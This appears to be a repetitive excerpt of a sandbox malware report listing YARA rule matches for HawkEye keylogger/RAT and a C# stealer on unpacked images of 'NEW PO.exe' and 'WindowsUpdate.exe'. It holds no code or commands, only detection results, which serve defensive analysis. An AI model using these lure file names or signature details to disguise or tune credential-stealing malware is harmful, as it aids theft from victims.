Source: 16.0.WindowsUpdate.exe.408208.23.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.8640000.47.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.408208.7.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.408208.7.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.WindowsUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.408208.7.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.400000.26.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.400000.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.400000.26.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.2afd174.31.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.NEW PO.exe.474fbd0.5.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0.2.NEW PO.exe.474fbd0.5.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.NEW PO.exe.474fbd0.5.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.WindowsUpdate.exe.45fa72.22.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.0.WindowsUpdate.exe.45fa72.22.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.45fa72.38.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.45fa72.38.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.WindowsUpdate.exe.408208.1.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.2.WindowsUpdate.exe.408208.1.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.2.WindowsUpdate.exe.408208.1.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.45fa72.40.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.45fa72.40.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.WindowsUpdate.exe.409c0d.1.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.2.WindowsUpdate.exe.409c0d.1.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.WindowsUpdate.exe.409c0d.3.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.2.WindowsUpdate.exe.409c0d.3.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.409c0d.19.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.45fa72.29.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.45fa72.29.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.409c0d.19.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.WindowsUpdate.exe.45fa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.2.WindowsUpdate.exe.45fa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.409c0d.23.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.409c0d.23.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.2d94168.32.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.35e4248.32.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.WindowsUpdate.exe.408208.2.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.2.WindowsUpdate.exe.408208.2.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.WindowsUpdate.exe.408208.2.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.409c0d.39.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.409c0d.39.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.WindowsUpdate.exe.8660000.10.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.NEW PO.exe.2acb1c8.5.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.332d36c.42.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.409c0d.12.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.409c0d.12.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.400000.16.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.400000.38.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.400000.38.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.400000.38.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.7c60000.36.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.WindowsUpdate.exe.409c0d.7.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.0.WindowsUpdate.exe.409c0d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.WindowsUpdate.exe.459fbd0.4.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 17.2.WindowsUpdate.exe.459fbd0.4.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.2.WindowsUpdate.exe.459fbd0.4.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.2d94168.44.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.408208.13.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.408208.13.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.408208.13.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.408208.13.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.45fa72.19.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.45fa72.19.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.NEW PO.exe.7c60000.9.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.WindowsUpdate.exe.32fb060.5.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.NEW PO.exe.408208.3.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.2.NEW PO.exe.408208.3.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.NEW PO.exe.408208.3.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.WindowsUpdate.exe.408208.9.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.0.WindowsUpdate.exe.408208.9.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.WindowsUpdate.exe.408208.9.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.45fa72.24.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.45fa72.24.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.408208.28.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.408208.28.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.408208.28.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.WindowsUpdate.exe.409c0d.14.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.0.WindowsUpdate.exe.409c0d.14.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.NEW PO.exe.45fa72.1.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.2.NEW PO.exe.45fa72.1.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.WindowsUpdate.exe.45fa72.8.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.0.WindowsUpdate.exe.45fa72.8.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
